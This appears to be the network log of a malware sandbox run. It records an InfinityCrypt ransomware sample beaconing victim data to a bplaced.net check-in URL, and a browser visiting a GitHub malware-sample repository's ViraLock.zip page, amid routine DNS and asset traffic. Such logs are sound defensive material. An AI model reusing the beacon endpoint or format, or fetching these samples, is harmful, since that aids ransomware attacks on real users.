                          http://arizonacode.bplaced.net/rnsm/add.php?type=add&data=InfinityCrypt%7CAdmin%7CqEzQ2xXx1OPDxXx2dm7xXxmhgPxXxRDmyxXxO24ZxXx%7CMicrosoft%20Windows%2010%20Enterprise%20LTSC%7C0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD%7C3418
                          Endermanch@InfinityCrypt.exe
                          Remote address:
                          162.55.0.137:80
                          Request
                          GET /rnsm/add.php?type=add&data=InfinityCrypt%7CAdmin%7CqEzQ2xXx1OPDxXx2dm7xXxmhgPxXxRDmyxXxO24ZxXx%7CMicrosoft%20Windows%2010%20Enterprise%20LTSC%7C0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD%7C3418 HTTP/1.1
                          Referer: http://arizonacode.bplaced.net/rnsm/add.php?type=add&data=InfinityCrypt|Admin|qEzQ2xXx1OPDxXx2dm7xXxmhgPxXxRDmyxXxO24ZxXx|Microsoft Windows 10 Enterprise LTSC|0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD|3418
                          Host: arizonacode.bplaced.net
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 403 Forbidden
                          Date: Mon, 27 Jan 2025 17:30:41 GMT
                          Server: Apache
                          X-BP-NSA-REQID: (null) a.14UID=77
                          X-Content-Type-Options: nosniff
                          X-Frame-Options: sameorigin
                          Upgrade: h2,h2c
                          Connection: Upgrade, Keep-Alive
                          Last-Modified: Sat, 08 Oct 2022 17:29:29 GMT
                          ETag: "1bbf-5ea8944ceff23"
                          Accept-Ranges: bytes
                          Content-Length: 7103
                          Vary: Accept-Encoding
                          Keep-Alive: timeout=4, max=500
                          Content-Type: text/html
                        • flag-us
                          DNS
                          137.0.55.162.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          137.0.55.162.in-addr.arpa
                          IN PTR
                          Response
                          137.0.55.162.in-addr.arpa
                          IN PTR
                          mxbplacednet
                        • flag-us
                          DNS
                          137.0.55.162.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          137.0.55.162.in-addr.arpa
                          IN PTR
                          Response
                          137.0.55.162.in-addr.arpa
                          IN PTR
                          mxbplacednet
                        • flag-us
                          DNS
                          prod.balrog.prod.cloudops.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.balrog.prod.cloudops.mozgcp.net
                          IN A
                          Response
                          prod.balrog.prod.cloudops.mozgcp.net
                          IN A
                          35.244.181.201
                        • flag-us
                          DNS
                          prod.balrog.prod.cloudops.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.balrog.prod.cloudops.mozgcp.net
                          IN A
                          Response
                          prod.balrog.prod.cloudops.mozgcp.net
                          IN A
                          35.244.181.201
                        • flag-us
                          DNS
                          prod.balrog.prod.cloudops.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.balrog.prod.cloudops.mozgcp.net
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          prod.balrog.prod.cloudops.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.balrog.prod.cloudops.mozgcp.net
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          prod.remote-settings.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.remote-settings.prod.webservices.mozgcp.net
                          IN A
                          Response
                          prod.remote-settings.prod.webservices.mozgcp.net
                          IN A
                          34.149.100.209
                        • flag-us
                          DNS
                          prod.remote-settings.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.remote-settings.prod.webservices.mozgcp.net
                          IN A
                          Response
                          prod.remote-settings.prod.webservices.mozgcp.net
                          IN A
                          34.149.100.209
                        • flag-us
                          DNS
                          prod.remote-settings.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.remote-settings.prod.webservices.mozgcp.net
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          IN AAAA
                          Response
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          IN AAAA
                          2600:1901:0:92a9::
                        • flag-us
                          DNS
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          IN AAAA
                          Response
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          IN AAAA
                          2600:1901:0:92a9::
                        • 127.0.0.1:49727
                          firefox.exe
                        • 20.26.156.215:443
                          https://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/ViraLock.zip
                          tls, http2
                          firefox.exe
                          7.3kB
                          218.8kB
                          63
                          207

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/latest-commit/master

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/refs?type=branch

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/tree-commit-info/master

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/branch-and-tag-count

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/security/overall-count

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/hovercards/citation/sidebar_partial?tree_name=master

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/used_by_list

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/contributors_list?count=5&current_repository=MalwareDatabase&items_to_show=5

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          204

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.com/fluidicon.png

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwares

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/tree-commit-info/master/ransomwares

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwares/ViraLock.zip

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/ViraLock.zip

                          HTTP Response

                          200

                          HTTP Response

                          200
                        • 20.26.156.215:443
                          github.com
                          tls, http2
                          firefox.exe
                          1.7kB
                          4.2kB
                          13
                          11
                        • 185.199.110.154:443
                          https://github.githubassets.com/favicons/favicon.svg
                          tls, http2
                          firefox.exe
                          25.5kB
                          1.2MB
                          270
                          1018

                          HTTP Request

                          GET https://github.githubassets.com/assets/light-7aa84bb7e11e.css

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/dark-f65db3e8d171.css

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/primer-primitives-d9abecd14f1e.css

                          HTTP Request

                          GET https://github.githubassets.com/assets/primer-93aded0ee8a1.css

                          HTTP Request

                          GET https://github.githubassets.com/assets/global-d579f4a5b443.css

                          HTTP Request

                          GET https://github.githubassets.com/assets/github-8049f990d299.css

                          HTTP Request

                          GET https://github.githubassets.com/assets/repository-6372f70837d3.css

                          HTTP Request

                          GET https://github.githubassets.com/assets/code-0210be90f4d3.css

                          HTTP Request

                          GET https://github.githubassets.com/assets/wp-runtime-763ea7117943.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-9da652f58479.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-3abb8f-d7e6bc799724.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-038efa22f8cd.js

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/environment-e300f3d2aeda.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-0dbb79f97f8f.js

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-f6da4b3fa34c.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-8e9f78-a74b4e0a8a6b.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-78748950cb0c.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b5f1d7-a1760ffda83d.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_markdown-toolbar-element_dist_index_js-ceef33f593fa.js

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-c44a69-f0c8a795d1fd.js

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/github-elements-ed51bf4a426a.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/element-registry-bfccf829ef3e.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-72267f4e3ff9.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f481b.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-a4a1922eb55f.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-e3cbe28f1638.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-69cfcc-833249ee3034.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-0d1db422e5cc.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-cab6164e492b.js

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-83e480198629.js

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-d0d0a6-5f1192bdc996.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-07c050c6d2d3.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/behaviors-4ff625c629d0.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f6223d90c7ba.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/notifications-global-7556bd523830.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-96453a51f920.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-eecf0d50276f.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-df71139e3900.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/codespaces-6b393e6a52d6.js

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-3eebbd-0763620ad7bf.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_delegated-events_di-e161aa-9d41fb1b6c9e.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_remote--3c9c82-7238cfcdaa51.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/repositories-92ede33111c0.js

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_catalyst_lib_inde-dbbea9-26cce2010167.js

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/code-menu-534f8f82fbb7.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/primer-react-6bae0b4b7a9d.js

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/react-core-56498741b362.js

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/react-lib-2131e17288a8.js

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/octicons-react-611691cca2f6.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_queryClient_js-e6f07a7e80b7.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-prop-valid_esm_js-node_modules_emo-37e3d5-92730c05e718.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-e7dcdd-f7cc96ebae76.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn_js-55fea94174bf.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/notifications-subscriptions-menu-903735ea697a.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/primer-react.69af3536c032f5d7cd94.module.css

                          HTTP Request

                          GET https://github.githubassets.com/assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.css

                          HTTP Request

                          GET https://github.githubassets.com/assets/ui_packages_ui-commands_ui-commands_ts-a706a57c5626.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/keyboard-shortcuts-dialog-02a61356799a.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-73b675cf164a.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/sessions-4f48836d3e05.js

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-b89b98661809.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_queryObserver_js-node_modules_tanstack_-defd52-843b41414e0e.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/ui_packages_aria-live_aria-live_ts-ui_packages_promise-with-resolvers-polyfill_promise-with-r-014121-9909ff6aa778.js

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/ui_packages_paths_index_ts-b6d716a998b0.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-47d1fc4a26b2.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-530254-10744b983dd4.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/ui_packages_code-view-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_hooks-495298-2e8f9997cff5.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/repos-overview-aed28e5cf7eb.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/repos-overview.32a87dc4587d56dcf1eb.module.css

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/chunk-app_components_primer_experimental_select-panel-element_ts-3663c076188e.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-adc992852f7f.js

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/chunk-app_components_search_custom-scopes-element_ts-2e2c4ea33da2.js

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-b7767a-9ad7d4eda3d9.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/ui_packages_query-builder-element_query-builder-element_ts-0f4cee7579d1.js

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-ui_packages_code-nav_code-nav_ts-ui_packages_filter--8253c1-bd96236c8a65.js

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_jump-to-element_model_ts-9e49b0faf8a7.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/chunk-app_components_search_qbsearch-input-element_ts-3637d26ede66.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-link-element_element-entry_ts-158b85aa02cf.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/chunk-ui_packages_ghcc-consent-element_element-entry_ts-3c480140bb8e.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/chunk-ui_packages_markdown-accessiblity-table-element_element-entry_ts-8b624cefa171.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-5f477b-eeb221e8a5a3.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_query-builder-element_element-entry_ts-d09671e2bdec.js

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/chunk-ui_packages_webauthn-get-element_element-entry_ts-141bb9da12c5.js

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/chunk-ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-56b769a41ee6.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-362ca569b596.js

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/favicons/favicon.svg

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/react-code-view.ab7d8fac328c00e5e0cc.module.css

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-b89b98661809.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_lodash-es__Stack_js-node_modules_lodash-es__Uint8Array_js-node_modules_l-4faaa6-4a736fde5c2f.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_lodash-es__baseIsEqual_js-8929eb9718d5.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/vendors-node_modules_react-reverse-portal_dist_web_index_js-node_modules_primer_live-region-e-18c5ad-0b67a5a18b33.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/ui_packages_repos-file-tree-view_repos-file-tree-view_ts-ui_packages_feature-request_FeatureR-648c3b-10a5d1781a97.js

                          HTTP Request

                          GET https://github.githubassets.com/assets/react-code-view-a2de824f33c8.js

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/favicons/favicon.svg

                          HTTP Request

                          GET https://github.githubassets.com/images/gravatars/gravatar-user-420.png?size=40

                          HTTP Request

                          GET https://github.githubassets.com/images/gravatars/gravatar-user-420.png?size=40

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/assets/repos-overview-aed28e5cf7eb.js

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.githubassets.com/favicons/favicon.svg

                          HTTP Response

                          200
                        • 185.199.108.133:443
                          https://private-user-images.githubusercontent.com/44542704/353824714-9af0a0be-eda5-4826-a3b6-e3ab436cd974.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mzc5OTkxODcsIm5iZiI6MTczNzk5ODg4NywicGF0aCI6Ii80NDU0MjcwNC8zNTM4MjQ3MTQtOWFmMGEwYmUtZWRhNS00ODI2LWEzYjYtZTNhYjQzNmNkOTc0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAxMjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMTI3VDE3MjgwN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWQ1ZmIwNDM4Nzg3NzQ3NmYwMmU1NWJhZmNlMjg0MzM1M2FmOTJjOWY3ZTNlOWQxZmZiN2E4NzlmMjFkYmZlOWMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.w6Ayr3_N9Rcc8rSf9BjA1rw0L28iAUWurI7vkbOrU0Q
                          tls, http2
                          firefox.exe
                          6.9kB
                          252.3kB
                          62
                          217

                          HTTP Request

                          GET https://private-user-images.githubusercontent.com/44542704/353824714-9af0a0be-eda5-4826-a3b6-e3ab436cd974.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mzc5OTkwODAsIm5iZiI6MTczNzk5ODc4MCwicGF0aCI6Ii80NDU0MjcwNC8zNTM4MjQ3MTQtOWFmMGEwYmUtZWRhNS00ODI2LWEzYjYtZTNhYjQzNmNkOTc0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAxMjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMTI3VDE3MjYyMFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTY0YmNiOTg4YmViYTRiMjNmMjgyYTU4OGY0NGE4YWNlZWVhOTc5NjhiMTVjNWEzZDQ0ZGNlMTRhZmI5ODk2YjImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.IGbClDmY_DNYVxglPhNP_7b9LyEfsKHPcdINUygPZtY

                          HTTP Response

                          200

                          HTTP Request

                          GET https://avatars.githubusercontent.com/u/44542704?v=4&size=40

                          HTTP Request

                          GET https://avatars.githubusercontent.com/u/44542704?v=4&size=40

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://avatars.githubusercontent.com/u/44542704?s=64&v=4

                          HTTP Request

                          GET https://avatars.githubusercontent.com/u/39349444?s=64&v=4

                          HTTP Request

                          GET https://avatars.githubusercontent.com/u/51242428?s=64&v=4

                          HTTP Request

                          GET https://avatars.githubusercontent.com/u/63458929?s=64&v=4

                          HTTP Request

                          GET https://avatars.githubusercontent.com/u/17717494?s=64&v=4

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://private-user-images.githubusercontent.com/44542704/353824714-9af0a0be-eda5-4826-a3b6-e3ab436cd974.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mzc5OTkxODcsIm5iZiI6MTczNzk5ODg4NywicGF0aCI6Ii80NDU0MjcwNC8zNTM4MjQ3MTQtOWFmMGEwYmUtZWRhNS00ODI2LWEzYjYtZTNhYjQzNmNkOTc0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAxMjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMTI3VDE3MjgwN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWQ1ZmIwNDM4Nzg3NzQ3NmYwMmU1NWJhZmNlMjg0MzM1M2FmOTJjOWY3ZTNlOWQxZmZiN2E4NzlmMjFkYmZlOWMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.w6Ayr3_N9Rcc8rSf9BjA1rw0L28iAUWurI7vkbOrU0Q

                          HTTP Response

                          200
                        • 185.199.109.133:443
                          private-user-images.githubusercontent.com
                          tls, http2
                          firefox.exe
                          1.6kB
                          5.0kB
                          14
                          13
                        • 185.199.109.133:443
                          private-user-images.githubusercontent.com
                          tls, http2
                          firefox.exe
                          1.5kB
                          5.0kB
                          13
                          13
                        • 140.82.113.21:443
                          https://collector.github.com/github/collect
                          tls, http2
                          firefox.exe
                          22.3kB
                          14.3kB
                          67
                          62

                          HTTP Request

                          POST https://collector.github.com/github/collect

                          HTTP Request

                          POST https://collector.github.com/github/collect

                          HTTP Response

                          204

                          HTTP Response

                          204

                          HTTP Request

                          POST https://collector.github.com/github/collect

                          HTTP Response

                          204

                          HTTP Request

                          POST https://collector.github.com/github/collect

                          HTTP Response

                          204

                          HTTP Request

                          POST https://collector.github.com/github/collect

                          HTTP Request

                          POST https://collector.github.com/github/collect

                          HTTP Request

                          POST https://collector.github.com/github/collect

                          HTTP Response

                          204

                          HTTP Response

                          204

                          HTTP Response

                          204

                          HTTP Request

                          POST https://collector.github.com/github/collect

                          HTTP Response

                          204

                          HTTP Request

                          POST https://collector.github.com/github/collect

                          HTTP Response

                          204

                          HTTP Request

                          POST https://collector.github.com/github/collect

                          HTTP Response

                          204

                          HTTP Request

                          POST https://collector.github.com/github/collect

                          HTTP Request

                          POST https://collector.github.com/github/collect

                          HTTP Request

                          POST https://collector.github.com/github/collect

                          HTTP Response

                          204

                          HTTP Response

                          204

                          HTTP Response

                          204
                        • 140.82.113.21:443
                          collector.github.com
                          firefox.exe
                          98 B
                          52 B
                          2
                          1
                        • 20.26.156.210:443
                          https://api.github.com/_private/browser/stats
                          tls, http2
                          firefox.exe
                          5.0kB
                          8.9kB
                          26
                          26

                          HTTP Request

                          POST https://api.github.com/_private/browser/stats

                          HTTP Response

                          200

                          HTTP Request

                          POST https://api.github.com/_private/browser/stats

                          HTTP Response

                          200

                          HTTP Request

